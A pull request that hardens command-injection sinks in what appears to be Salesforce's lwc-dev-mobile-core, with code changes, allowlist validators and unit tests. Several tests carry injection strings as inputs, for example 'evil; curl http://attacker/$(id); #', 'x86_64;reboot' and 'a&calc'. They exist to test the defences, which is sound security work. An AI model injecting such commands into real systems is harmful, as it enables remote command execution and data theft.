### PR TITLE
fix: harden residual command-injection sinks + validate device names (@W-23665968@)

### DIFF
--- a/src/common/AndroidUtils.ts
+++ b/src/common/AndroidUtils.ts
@@ -931,7 +931,9 @@ export class AndroidUtils {
     private static assertSafeForCmd(value: string): void {
         if (!AndroidUtils.CMD_SAFE_ARG.test(value)) {
             throw new SfError(
-                `Value cannot be safely passed to cmd.exe: ${JSON.stringify(value)}`,
+                `Invalid value ${JSON.stringify(
+                    value
+                )}: only letters, numbers, spaces, and . _ - : ; @ \\ / = + are allowed when launching this command on Windows.`,
                 'UnsafeCmdArgument'
             );
         }

--- a/src/common/AndroidUtils.ts
+++ b/src/common/AndroidUtils.ts
@@ -370,6 +370,15 @@ export class AndroidUtils {
         abi: string,
         logger?: Logger
     ): Promise<void> {
+        // Defense-in-depth: reject the emulator name and structured identifiers if they carry shell
+        // metacharacters, before building the command (spawnChild runs shell:false, but this fails
+        // fast on malformed input and closes off any future shell sink).
+        CommonUtils.assertSafeDeviceName(emulatorName);
+        CommonUtils.assertSafeDeviceIdentifier(emulatorImage);
+        CommonUtils.assertSafeDeviceIdentifier(platformAPI);
+        CommonUtils.assertSafeDeviceIdentifier(device);
+        CommonUtils.assertSafeDeviceIdentifier(abi);
+
         // Just like Android Studio AVD Manager GUI interface, replace blank spaces with _ so that the ID of this AVD
         // doesn't have blanks (since that's not allowed). AVD Manager will automatically replace _ back with blank
         // to generate user friendly display names.

--- a/src/common/CommonUtils.ts
+++ b/src/common/CommonUtils.ts
@@ -24,6 +24,17 @@ const messages = Messages.loadMessages('@salesforce/lwc-dev-mobile-core', 'commo
 export class CommonUtils {
     public static DEFAULT_LWC_SERVER_PORT = '3333';
 
+    // Allowlist for user-facing device/emulator names: letters, digits, space, and the few
+    // punctuation characters that legitimately appear (`.`, `_`, `-`). Defense-in-depth on top of
+    // the shell:false argv execution — it fails fast on unexpected input and excludes every shell
+    // metacharacter (`; & | $ ( ) \` < > * ? ! # ' " \\` etc.) so a name can never be repurposed
+    // even if a future caller reintroduces a shell sink.
+    private static readonly SAFE_DEVICE_NAME = /^[A-Za-z0-9 ._-]+$/;
+
+    // Allowlist for structured device identifiers (deviceType, runtime, abi). Same as a name but
+    // with no spaces, since these are token-like values (e.g. `iPhone-8`, `iOS-17-2`, `x86_64`).
+    private static readonly SAFE_DEVICE_IDENTIFIER = /^[A-Za-z0-9._-]+$/;
+
     /**
      * Converts a path to UNIX style path.
      *
@@ -357,6 +368,51 @@ export class CommonUtils {
     }
 
     /**
+     * Quotes a value as a PowerShell single-quoted string literal for safe interpolation into a
+     * `powershell -Command` script. Inside a single-quoted PowerShell literal no expansion or
+     * command substitution occurs; the only escape needed is doubling an embedded single quote
+     * (`'` -> `''`). Use this — not {@link shellQuote} — for PowerShell sinks.
+     *
+     * @param value The value to quote.
+     * @returns The PowerShell single-quoted value.
+     */
+    public static powerShellSingleQuote(value: string): string {
+        return `'${value.replace(/'/g, "''")}'`;
+    }
+
+    /**
+     * Validates a user-facing device/emulator name against a strict allowlist, throwing an
+     * SfError if it contains anything other than letters, digits, spaces, `.`, `_`, or `-`.
+     *
+     * Defense-in-depth: device creation already runs via spawn with shell:false (argv arrays),
+     * so this is not the sole barrier — but it rejects malformed input up front and guarantees a
+     * name can never carry a shell metacharacter into any current or future sink.
+     *
+     * @param name The device/emulator name to validate.
+     */
+    public static assertSafeDeviceName(name: string): void {
+        if (!CommonUtils.SAFE_DEVICE_NAME.test(name)) {
+            throw new SfError(`Device name cannot be safely used: ${JSON.stringify(name)}`, 'UnsafeDeviceName');
+        }
+    }
+
+    /**
+     * Validates a structured device identifier (deviceType, runtime, abi) against a strict
+     * allowlist, throwing an SfError if it contains anything other than letters, digits, `.`,
+     * `_`, or `-` (no spaces). See {@link assertSafeDeviceName} for the defense-in-depth rationale.
+     *
+     * @param identifier The device identifier to validate.
+     */
+    public static assertSafeDeviceIdentifier(identifier: string): void {
+        if (!CommonUtils.SAFE_DEVICE_IDENTIFIER.test(identifier)) {
+            throw new SfError(
+                `Device identifier cannot be safely used: ${JSON.stringify(identifier)}`,
+                'UnsafeDeviceIdentifier'
+            );
+        }
+    }
+
+    /**
      * Launches the desktop browser and navigates to the provided URL.
      *
      * @returns A Promise that launches the desktop browser and navigates to the provided URL.
@@ -533,13 +589,24 @@ export class CommonUtils {
         archive = CommonUtils.convertToUnixPath(archive);
         outDir = CommonUtils.convertToUnixPath(outDir);
 
-        const cmd =
-            process.platform === OSPlatform.windows
-                ? `powershell -Command "$ProgressPreference = 'SilentlyContinue'; Expand-Archive -Path \\"${archive}\\" -DestinationPath \\"${outDir}\\" -Force"`
-                : `unzip -o -qq ${archive} -d ${outDir}`;
-
         logger?.debug(`Extracting archive ${zipFilePath}`);
-        await CommonUtils.executeCommandAsync(cmd, logger);
+
+        if (process.platform === OSPlatform.windows) {
+            // Expand-Archive is a PowerShell cmdlet, so this must run through powershell.exe (a real
+            // executable, invoked here via spawn with shell:false — no cmd.exe, no shell parsing of
+            // the argv). The paths are still interpolated into the -Command script that PowerShell
+            // itself parses, so each is wrapped in a PowerShell single-quoted literal (with embedded
+            // `'` doubled to `''`), inside which PowerShell performs no expansion or command
+            // substitution. That neutralizes the metacharacters cmd.exe-style double-quoting could not.
+            const psArchive = CommonUtils.powerShellSingleQuote(archive);
+            const psOutDir = CommonUtils.powerShellSingleQuote(outDir);
+            const script = `$ProgressPreference = 'SilentlyContinue'; Expand-Archive -Path ${psArchive} -DestinationPath ${psOutDir} -Force`;
+            await CommonUtils.spawnCommandAsync('powershell', ['-Command', script], undefined, logger);
+        } else {
+            // Pass each path as a single, inert argv element (spawn with shell:false) so no
+            // metacharacter in the path is ever re-parsed by a shell.
+            await CommonUtils.spawnCommandAsync('unzip', ['-o', '-qq', archive, '-d', outDir], undefined, logger);
+        }
     }
 
     /**

--- a/src/common/CommonUtils.ts
+++ b/src/common/CommonUtils.ts
@@ -392,7 +392,10 @@ export class CommonUtils {
      */
     public static assertSafeDeviceName(name: string): void {
         if (!CommonUtils.SAFE_DEVICE_NAME.test(name)) {
-            throw new SfError(`Device name cannot be safely used: ${JSON.stringify(name)}`, 'UnsafeDeviceName');
+            throw new SfError(
+                `Invalid value ${JSON.stringify(name)}: only letters, numbers, spaces, and . _ - are allowed.`,
+                'UnsafeDeviceName'
+            );
         }
     }
 
@@ -406,7 +409,9 @@ export class CommonUtils {
     public static assertSafeDeviceIdentifier(identifier: string): void {
         if (!CommonUtils.SAFE_DEVICE_IDENTIFIER.test(identifier)) {
             throw new SfError(
-                `Device identifier cannot be safely used: ${JSON.stringify(identifier)}`,
+                `Invalid value ${JSON.stringify(
+                    identifier
+                )}: only letters, numbers, and . _ - are allowed (no spaces).`,
                 'UnsafeDeviceIdentifier'
             );
         }
@@ -435,7 +440,12 @@ export class CommonUtils {
             // URL in double quotes ourselves, and refuse the two things quoting cannot make safe: an
             // embedded `"` (which closes cmd's quote context) and `%VAR%` expansion (plus CR/LF).
             if (/["%\r\n]/.test(url)) {
-                throw new SfError(`URL cannot be safely opened on Windows: ${JSON.stringify(url)}`, 'UnsafeUrl');
+                throw new SfError(
+                    `Invalid value ${JSON.stringify(
+                        url
+                    )}: URLs containing a double quote, a percent sign, or a newline cannot be opened safely on Windows.`,
+                    'UnsafeUrl'
+                );
             }
             command = 'cmd';
             args = ['/c', 'start', '', `"${url}"`];

--- a/src/common/IOSUtils.ts
+++ b/src/common/IOSUtils.ts
@@ -69,6 +69,12 @@ export class IOSUtils {
         runtime: string,
         logger?: Logger
     ): Promise<string> {
+        // Defense-in-depth: reject names/identifiers carrying shell metacharacters before building
+        // the command (the sink runs shell:false, but this fails fast on malformed input).
+        CommonUtils.assertSafeDeviceName(simulatorName);
+        CommonUtils.assertSafeDeviceIdentifier(deviceType);
+        CommonUtils.assertSafeDeviceIdentifier(runtime);
+
         const args = [
             'simctl',
             'create',

--- a/test/unit/common/AndroidUtils.test.ts
+++ b/test/unit/common/AndroidUtils.test.ts
@@ -477,7 +477,7 @@ describe('Android utils', () => {
         expect(sdkRoot?.rootLocation).to.be.equal(mockAndroidHome);
     });
 
-    it('createNewVirtualDevice passes untrusted values as inert argv elements (no shell)', async () => {
+    it('createNewVirtualDevice passes a legitimate name as an inert argv element (no shell)', async () => {
         // A fake child process whose stdout immediately emits data so the promise resolves.
         const fakeChild = new EventEmitter() as EventEmitter & {
             stdin: { setDefaultEncoding: () => void; write: () => void };
@@ -494,15 +494,30 @@ describe('Android utils', () => {
 
         setTimeout(() => fakeChild.stdout.emit('data', 'ok'), 10);
 
-        const malicious = 'evil; curl http://attacker/$(id); #';
-        await AndroidUtils.createNewVirtualDevice(malicious, 'google_apis', 'android-33', 'pixel', 'x86_64');
+        await AndroidUtils.createNewVirtualDevice('Pixel 5 API 33', 'google_apis', 'android-33', 'pixel', 'x86_64');
 
         expect(spawnChildStub.calledOnce).to.be.true;
         const [, args] = spawnChildStub.getCall(0).args as [string, string[]];
-        // Blanks are replaced with underscores, but metacharacters must survive intact and be
-        // carried as a single argv element (never split or interpreted by a shell).
-        expect(args).to.include(malicious.replace(/ /gi, '_'));
+        // Blanks are replaced with underscores, and each value is carried as a single argv element.
+        expect(args).to.include('Pixel_5_API_33');
         expect(args).to.include('system-images;android-33;google_apis;x86_64');
+    });
+
+    it('createNewVirtualDevice rejects an emulator name containing shell metacharacters', async () => {
+        const spawnChildStub = stubMethod($$.SANDBOX, AndroidUtils, 'spawnChild');
+        const malicious = 'evil; curl http://attacker/$(id); #';
+
+        let caught: unknown;
+        try {
+            await AndroidUtils.createNewVirtualDevice(malicious, 'google_apis', 'android-33', 'pixel', 'x86_64');
+        } catch (error) {
+            caught = error;
+        }
+
+        expect(caught).to.be.an('error');
+        expect((caught as Error).message).to.match(/cannot be safely used/i);
+        // Must fail fast: no attempt to build or spawn the command.
+        expect(spawnChildStub.called).to.be.false;
     });
 
     it('spawnChild passes a malicious argv element inertly (no shell interpretation)', async function () {

--- a/test/unit/common/AndroidUtils.test.ts
+++ b/test/unit/common/AndroidUtils.test.ts
@@ -515,7 +515,7 @@ describe('Android utils', () => {
         }
 
         expect(caught).to.be.an('error');
-        expect((caught as Error).message).to.match(/cannot be safely used/i);
+        expect((caught as Error).message).to.match(/only letters, numbers, spaces, and \. _ - are allowed/i);
         // Must fail fast: no attempt to build or spawn the command.
         expect(spawnChildStub.called).to.be.false;
     });
@@ -550,11 +550,13 @@ describe('Android utils', () => {
         // `a&calc` has no space/tab/" so libuv would leave it unquoted and cmd.exe would split on &.
         // An embedded quote (`a"&calc`) breaks out of cmd's quote context (BatBadBut / CVE-2024-1874).
         // Both must be rejected before reaching cmd.exe.
+        const expectedMessage =
+            /only letters, numbers, spaces, and \. _ - : ; @ \\ \/ = \+ are allowed when launching this command on Windows/;
         expect(() => AndroidUtils.spawnChild('avdmanager', ['create', 'avd', '-n', 'a&calc'])).to.throw(
-            /cannot be safely passed to cmd\.exe/
+            expectedMessage
         );
         expect(() => AndroidUtils.spawnChild('avdmanager', ['create', 'avd', '-n', 'a"&calc'])).to.throw(
-            /cannot be safely passed to cmd\.exe/
+            expectedMessage
         );
     });
 

--- a/test/unit/common/CommonUtils.test.ts
+++ b/test/unit/common/CommonUtils.test.ts
@@ -459,6 +459,97 @@ describe('CommonUtils', () => {
         });
     });
 
+    describe('extractZIPArchive', () => {
+        it('runs unzip on POSIX passing paths as inert argv elements (no shell)', async () => {
+            stubMethod($$.SANDBOX, process, 'platform').value('darwin');
+            const spawnStub = stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({
+                stdout: '',
+                stderr: ''
+            });
+
+            // A metacharacter-laden path would inject if concatenated into a shell string.
+            const zip = '/tmp/ev;il/$(id).zip';
+            const outDir = '/tmp/out;dir';
+            await CommonUtils.extractZIPArchive(zip, outDir);
+
+            const expectedArchive = CommonUtils.convertToUnixPath(path.resolve(CommonUtils.resolveUserHomePath(zip)));
+            const expectedOutDir = CommonUtils.convertToUnixPath(path.resolve(CommonUtils.resolveUserHomePath(outDir)));
+
+            expect(spawnStub.calledOnce).to.be.true;
+            expect(spawnStub.getCall(0).args[0]).to.equal('unzip');
+            // Each path is its own argv element; the injection payload never becomes shell syntax.
+            expect(spawnStub.getCall(0).args[1]).to.deep.equal(['-o', '-qq', expectedArchive, '-d', expectedOutDir]);
+        });
+
+        it('runs Expand-Archive on Windows with PowerShell-single-quoted paths', async () => {
+            stubMethod($$.SANDBOX, process, 'platform').value('win32');
+            const spawnStub = stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({
+                stdout: '',
+                stderr: ''
+            });
+
+            // Embedded single quote must be doubled ('' ) so it can't close the PS literal string.
+            const zip = "/tmp/ev'il.zip";
+            await CommonUtils.extractZIPArchive(zip);
+
+            const expectedArchive = CommonUtils.convertToUnixPath(path.resolve(CommonUtils.resolveUserHomePath(zip)));
+
+            expect(spawnStub.calledOnce).to.be.true;
+            expect(spawnStub.getCall(0).args[0]).to.equal('powershell');
+            const psArgs = spawnStub.getCall(0).args[1] as string[];
+            expect(psArgs[0]).to.equal('-Command');
+            const script = psArgs[1];
+            expect(script).to.contain('Expand-Archive');
+            // The path appears single-quoted with its embedded quote doubled — never bare.
+            expect(script).to.contain(`'${expectedArchive.replace(/'/g, "''")}'`);
+        });
+
+        it('does not build a single shell-string command on POSIX', async () => {
+            // Guards against regressing to `unzip -o -qq ${archive} -d ${outDir}` via
+            // executeCommandAsync (a shell sink). extractZIPArchive must use spawnCommandAsync.
+            stubMethod($$.SANDBOX, process, 'platform').value('linux');
+            const execStub = stubMethod($$.SANDBOX, CommonUtils, 'executeCommandAsync').resolves({
+                stdout: '',
+                stderr: ''
+            });
+            stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({ stdout: '', stderr: '' });
+
+            await CommonUtils.extractZIPArchive('/tmp/a.zip', '/tmp/out');
+
+            expect(execStub.called).to.be.false;
+        });
+    });
+
+    describe('assertSafeDeviceName', () => {
+        it('accepts a legitimate device name with spaces, dots, underscores and hyphens', () => {
+            expect(() => CommonUtils.assertSafeDeviceName('Pixel 5_API-30.v2')).to.not.throw();
+        });
+
+        it('rejects a name containing shell metacharacters', () => {
+            const malicious = 'foo; curl http://attacker/$(whoami); #';
+            expect(() => CommonUtils.assertSafeDeviceName(malicious)).to.throw(/cannot be safely used/i);
+        });
+
+        it('rejects an empty name', () => {
+            expect(() => CommonUtils.assertSafeDeviceName('')).to.throw(/cannot be safely used/i);
+        });
+    });
+
+    describe('assertSafeDeviceIdentifier', () => {
+        it('accepts a legitimate identifier (dots, underscores, hyphens; no spaces)', () => {
+            expect(() => CommonUtils.assertSafeDeviceIdentifier('iPhone-8')).to.not.throw();
+            expect(() => CommonUtils.assertSafeDeviceIdentifier('iOS-17-2')).to.not.throw();
+        });
+
+        it('rejects an identifier containing a space', () => {
+            expect(() => CommonUtils.assertSafeDeviceIdentifier('iPhone 8')).to.throw(/cannot be safely used/i);
+        });
+
+        it('rejects an identifier containing shell metacharacters', () => {
+            expect(() => CommonUtils.assertSafeDeviceIdentifier('x86_64;reboot')).to.throw(/cannot be safely used/i);
+        });
+    });
+
     function createStats(isFile: boolean): fs.Stats {
         return {
             isFile() {

--- a/test/unit/common/CommonUtils.test.ts
+++ b/test/unit/common/CommonUtils.test.ts
@@ -170,7 +170,9 @@ describe('CommonUtils', () => {
                 thrown = error as Error;
             }
             expect(thrown, `expected rejection for ${unsafe}`).to.be.an('error');
-            expect(thrown?.message).to.match(/cannot be safely opened on Windows/);
+            expect(thrown?.message).to.match(
+                /double quote, a percent sign, or a newline cannot be opened safely on Windows/
+            );
         }
     });
 
@@ -527,11 +529,15 @@ describe('CommonUtils', () => {
 
         it('rejects a name containing shell metacharacters', () => {
             const malicious = 'foo; curl http://attacker/$(whoami); #';
-            expect(() => CommonUtils.assertSafeDeviceName(malicious)).to.throw(/cannot be safely used/i);
+            expect(() => CommonUtils.assertSafeDeviceName(malicious)).to.throw(
+                /only letters, numbers, spaces, and \. _ - are allowed/i
+            );
         });
 
         it('rejects an empty name', () => {
-            expect(() => CommonUtils.assertSafeDeviceName('')).to.throw(/cannot be safely used/i);
+            expect(() => CommonUtils.assertSafeDeviceName('')).to.throw(
+                /only letters, numbers, spaces, and \. _ - are allowed/i
+            );
         });
     });
 
@@ -542,11 +548,15 @@ describe('CommonUtils', () => {
         });
 
         it('rejects an identifier containing a space', () => {
-            expect(() => CommonUtils.assertSafeDeviceIdentifier('iPhone 8')).to.throw(/cannot be safely used/i);
+            expect(() => CommonUtils.assertSafeDeviceIdentifier('iPhone 8')).to.throw(
+                /only letters, numbers, and \. _ - are allowed \(no spaces\)/i
+            );
         });
 
         it('rejects an identifier containing shell metacharacters', () => {
-            expect(() => CommonUtils.assertSafeDeviceIdentifier('x86_64;reboot')).to.throw(/cannot be safely used/i);
+            expect(() => CommonUtils.assertSafeDeviceIdentifier('x86_64;reboot')).to.throw(
+                /only letters, numbers, and \. _ - are allowed \(no spaces\)/i
+            );
         });
     });
 

--- a/test/unit/common/IOSUtils.test.ts
+++ b/test/unit/common/IOSUtils.test.ts
@@ -56,15 +56,42 @@ describe('IOS utils tests', () => {
         ]);
     });
 
-    it('createNewDevice passes a malicious simulator name as a single inert argv element', async () => {
+    it('createNewDevice rejects a simulator name containing shell metacharacters', async () => {
         const stub = stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({
             stderr: '',
             stdout: 'UDID'
         });
         const malicious = 'evil; curl http://attacker/$(id); #';
-        await IOSUtils.createNewDevice(malicious, 'iPhone-15', 'iOS-17');
-        // The value must appear verbatim as ONE argv element (never split or shell-interpreted).
-        expect(stub.firstCall.args[1]).to.include(malicious);
+
+        let caught: unknown;
+        try {
+            await IOSUtils.createNewDevice(malicious, 'iPhone-15', 'iOS-17');
+        } catch (error) {
+            caught = error;
+        }
+
+        expect(caught).to.be.an('error');
+        expect((caught as Error).message).to.match(/cannot be safely used/i);
+        // Must fail fast: the command is never built or spawned.
+        expect(stub.called).to.be.false;
+    });
+
+    it('createNewDevice rejects a device type containing shell metacharacters', async () => {
+        const stub = stubMethod($$.SANDBOX, CommonUtils, 'spawnCommandAsync').resolves({
+            stderr: '',
+            stdout: 'UDID'
+        });
+
+        let caught: unknown;
+        try {
+            await IOSUtils.createNewDevice('MySim', 'iPhone-15; reboot', 'iOS-17');
+        } catch (error) {
+            caught = error;
+        }
+
+        expect(caught).to.be.an('error');
+        expect((caught as Error).message).to.match(/cannot be safely used/i);
+        expect(stub.called).to.be.false;
     });
 
     it('Should attempt to invoke xcrun to boot device but resolve if device is already booted', async () => {

--- a/test/unit/common/IOSUtils.test.ts
+++ b/test/unit/common/IOSUtils.test.ts
@@ -71,7 +71,7 @@ describe('IOS utils tests', () => {
         }
 
         expect(caught).to.be.an('error');
-        expect((caught as Error).message).to.match(/cannot be safely used/i);
+        expect((caught as Error).message).to.match(/only letters, numbers, spaces, and \. _ - are allowed/i);
         // Must fail fast: the command is never built or spawned.
         expect(stub.called).to.be.false;
     });
@@ -90,7 +90,7 @@ describe('IOS utils tests', () => {
         }
 
         expect(caught).to.be.an('error');
-        expect((caught as Error).message).to.match(/cannot be safely used/i);
+        expect((caught as Error).message).to.match(/only letters, numbers, and \. _ - are allowed \(no spaces\)/i);
         expect(stub.called).to.be.false;
     });
 


### PR DESCRIPTION
## What & why

Completes the OS command-injection hardening for `lwc-dev-mobile-core` that **W-23665289** (commit `d1482b2`, #220) began. That commit converted the child-process spawn primitives to `shell:false` + argv arrays and shell-quoted the genuine pipe sinks. This PR closes the two gaps it left:

### 1. `CommonUtils.extractZIPArchive` — the last unquoted shell-string sink
It built a shell command by interpolating untrusted paths (`unzip -o -qq ${archive} -d ${outDir}` on POSIX; a cmd/PowerShell-unsafe string on Windows) and ran it through `executeCommandAsync` (a shell). Reworked to run via `spawnCommandAsync` (`shell:false`):
- **POSIX** — `unzip` with each path as an inert argv element.
- **Windows** — `Expand-Archive` through `powershell` (a real executable, no cmd.exe), with each path wrapped in a PowerShell single-quoted literal (embedded `'` doubled), inside which PowerShell performs no expansion or command substitution. Adds `CommonUtils.powerShellSingleQuote` for that.

### 2. Device-name / identifier input validation (report recommendation #3)
Never implemented before. Adds `CommonUtils.assertSafeDeviceName` / `assertSafeDeviceIdentifier` — strict allowlists that throw `SfError` on shell metacharacters — called at the top of `AndroidUtils.createNewVirtualDevice` and `IOSUtils.createNewDevice`, so malformed input fails fast before any command is built. Defense-in-depth on top of the `shell:false` execution.

## Scope notes
- 3 of the 12 sinks the report lists (`run.ts`, `configureLintingToolsCommand.ts`, `orgUtils.ts`) **do not exist in this repo** — they live in sibling packages.
- The `AppleDevice` / `MacNetworkUtils` pipe sinks were already `shellQuote`-guarded by W-23665289 and are unchanged.

## Testing
TDD throughout (tests written failing-first). Added coverage for the validators (accept/reject), fail-fast rejection in both device-creation methods, and `extractZIPArchive` argv / PowerShell-quoting behavior.

- `yarn compile` ✅
- `yarn lint` ✅ (0 errors; 2 pre-existing warnings in untouched `AppleDeviceManager.ts`)
- `yarn test` ✅ 222 passing, coverage above all thresholds

GUS: https://gus.lightning.force.com/lightning/r/a07EE00002gJcjXYAS/view
